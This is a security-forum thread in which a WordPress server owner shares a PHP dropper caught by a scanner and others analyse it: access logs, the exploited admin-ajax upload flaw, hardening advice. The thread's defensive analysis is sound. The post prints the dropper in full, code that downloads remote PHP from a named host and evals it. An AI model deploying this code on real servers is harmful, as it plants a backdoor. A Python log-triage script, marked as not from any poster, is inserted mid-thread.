FTL Posted October 22, 2023 (edited)

Real time scanner on my Ubuntu 22.04 server that's used just to host WordPress sites found and deleted this bad boy. Content of the file is as follows:

<?php
error_reporting(0);
$HomePath = $_SERVER['DOCUMENT_ROOT'] . "/wp-includes/Text/Diff/";
define('CUSTOM_FILE_PATH', $HomePath);
$file_path = __FILE__;
$file_name = basename($file_path);
$ch = curl_init('hxxp://ndot.us/za');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
eval('?>'.$result);
$customFilePath = CUSTOM_FILE_PATH . $file_name;
rename(__FILE__,$customFilePath);
?>

I've checked all sites' /wp-includes/Text/Diff directories and there are no new modified files/folders in any of them. What would be my next steps? Thanks in advance.

Edited October 22, 2023 by FTL
itman Posted October 22, 2023 (edited)

Access ndot.us/za in a browser on Windows and see what happens.

https://www.virustotal.com/gui/url/df38f83fac1af3dcc1a8c5380d99083d6ffa43ec6470c3bd433ed12541d1dc59/detection

Interestingly, Eset didn't block the code from being displayed.

Edited October 22, 2023 by itman
FTL (Author) Posted October 22, 2023

Chromium based browsers just show the code on the page in plain text. Firefox shows the page formatted. I can't see anything happening when I hit the page.

I have blocked outbound access to ndot.us now but just wondering if and what anything has already happened?
itman Posted October 22, 2023 (edited)

Quote (FTL, 2 hours ago): Firefox shows the page formatted

My FF 118.0.2 showed code in plain text format.

Note the modification author even stated who he is. Since this person has multiple scripts posted at Github, I assume this is where it originated from.

Edited October 22, 2023 by itman
itman Posted October 22, 2023

Eset now finally blocking the domain.

Also of interest is this domain won't scan at Sucuri. It displays the web site doesn't contain any data - go figure.
itman Posted October 22, 2023

Believe I found the original code at Github: https://gist.github.com/kosinix/52c13666c5632dae559910dbfe180df2
Gregecslo Posted October 23, 2023

Yes you did, I also found it. URLSCAN.IO shows multiple scans for this domain with different webshells hosted on it.

@FTL We also got this detection, but it's OK because, at least for us, the webserver returned 404 or 500 when the POST request was made (we do not host WordPress at all). So basically this is an automated script that tries to exploit some WordPress vulnerability and, if successful, curl downloads the webshell. Example:

95.214.27.5 - - [23/Oct/2023:05:39:30 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 500 1713 "-" mjdomain.com "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" APACHELOG

And yes, detection occurred on file:///tmp/phpMjc32fg, which is normal, because PHP processed this POST request.

So in my opinion nothing happened with your server, but check where that POST request was made and make sure WP and plugins are up to date.
itman Posted October 23, 2023

Quote (Gregecslo, 8 hours ago): Yes you did, I also found it.

The Github link I posted was to the original WP plug-in. My above posted screen shots show that this plug-in was modified by someone named Mr. 7Mind. This same individual also has numerous other scripts posted at Github including reverse shell backdoors. So it appears this hack was very much "an off-the-shelf" one.

The question is where was the modified WP plug-in acquired from?
Gregecslo Posted October 23, 2023

This I don't know. For me, detection came from this:

95.214.27.5 - - [23/Oct/2023:05:39:30 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 500 1713 "-" mjdomain.com "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" APACHELOG

And it seems that the exploited vuln is: https://support.alertlogic.com/hc/en-us/articles/115005740363-Metasploit-WordPress-Ajax-Load-More-Arbitrary-File-Upload

Again, I have NO WordPress site installed (but ESET did detect it anyway in PHP TEMP, which IS NORMAL); the server returns 404 or 500... That's why I said that the OP should check POST requests on the server...
FTL (Author) Posted October 26, 2023

So 4 times I've had this file created and RTS deleted it now, all on different sites - but they are all up to date for both WordPress and all plugins. Server is up to date too. Same pesky IP as well, so that's blocked now, but not the answer I know.

Site 1
95.214.27.5 - - [21/Oct/2023:18:32:22 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"

Site 2
95.214.27.5 - - [22/Oct/2023:16:25:54 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"

Site 3
95.214.27.5 - - [24/Oct/2023:22:26:34 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"

Site 4
95.214.27.5 - - [26/Oct/2023:08:18:28 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"

How is this PITA managing to continually drop malicious PHP files into the tmp folder on the server? In-depth scan of the server is clean.
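As an added example (not code from any poster in this thread), a small Python triage script for access-log lines in the format quoted above: it groups POSTs to /wp-admin/admin-ajax.php by source IP and user agent and reports which source ever got a 2xx reply, since the 400/500 responses in the thread mean the request was refused while an accepted request is the one worth investigating. The sample lines are taken from the thread plus one constructed 200 hit from a documentation-range IP and one benign GET.

```python
import re
from collections import defaultdict

# Common Log Format as quoted in this thread; the vhost field between referer and
# user agent is optional (Gregecslo's lines have it, FTL's do not).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" (?:(?P<vhost>\S+) )?"(?P<ua>[^"]*)"'
)
WATCH_PATHS = {"/wp-admin/admin-ajax.php"}

# Constructed sample: three lines from the thread, one constructed accepted (200)
# request from a documentation-range IP, and one benign GET that must be ignored.
SAMPLE_LINES = [
    '95.214.27.5 - - [23/Oct/2023:05:39:30 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 500 1713 "-" mjdomain.com "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"',
    '95.214.27.5 - - [21/Oct/2023:18:32:22 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"',
    '95.214.27.5 - - [22/Oct/2023:16:25:54 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"',
    '203.0.113.7 - - [26/Oct/2023:09:01:02 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 57 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"',
    '198.51.100.4 - - [26/Oct/2023:09:02:10 +0100] "GET /index.php HTTP/1.1" 200 5120 "-" "curl/8.0"',
]

def parse_line(line):
    """Return the log fields as a dict, or None if the line is not CLF-shaped."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec

def triage(lines):
    """Group POSTs to the watched paths: {(ip, ua): {hits, statuses, vhosts}}."""
    out = defaultdict(lambda: {"hits": 0, "statuses": defaultdict(int), "vhosts": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] not in WATCH_PATHS:
            continue
        key = (rec["ip"], rec["ua"])
        out[key]["hits"] += 1
        out[key]["statuses"][rec["status"]] += 1
        if rec["vhost"]:
            out[key]["vhosts"].add(rec["vhost"])
    return dict(out)

def accepted(summary):
    """Sources whose POSTs ever got a 2xx; a 400/500 means the request was refused."""
    return sorted(k for k, v in summary.items() if any(200 <= s < 300 for s in v["statuses"]))
```

Point the same functions at a real access log (one line per list element) and look at the vhosts of any accepted source to see which site to examine for dropped files.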
Marcos (Administrator) Posted October 26, 2023

Do you have Apache and PHP updated as well? You may want to take security measures for Apache and PHP, e.g. https://httpd.apache.org/docs/2.4/misc/security_tips.html and https://www.getastra.com/blog/php-security/php-security-guide/ for instance.
FTL (Author) Posted October 26, 2023

Hi Marcos, I use Nginx rather than Apache; both are on the latest stable versions I believe.

nginx version: nginx/1.24.0
PHP 8.2.11 (cli) (built: Oct 6 2023 09:47:18) (NTS)
Marcos (Administrator) Posted October 26, 2023

I would then contact a security company that audits websites.
Gregecslo Posted October 27, 2023 (edited)

Quote: And yes, detection occurred on file:///tmp/phpMjc32fg, which is normal, because PHP processed this POST request. Again, I have NO WordPress site installed (but ESET did detect it anyway in PHP TEMP, which IS NORMAL); the server returns 404 or 500...

If somebody does a POST request with a malicious file inside the POST request, PHP will process it (execution is done in the PHP TMP folder) and that is where the detection comes from. This also happens to me on a server where nothing is installed but apache + php... Deleted ESET, the SAME POST request came, no files were dropped (but the file was naturally in PHP).

The problem would be if you find an XXXX.php file which was dropped in the webserver folder...

Edited October 27, 2023 by Gregecslo
Gregecslo Posted October 27, 2023

Something like this: https://octobercms.com/forum/post/being-attacked-please-help?page=1#post-37387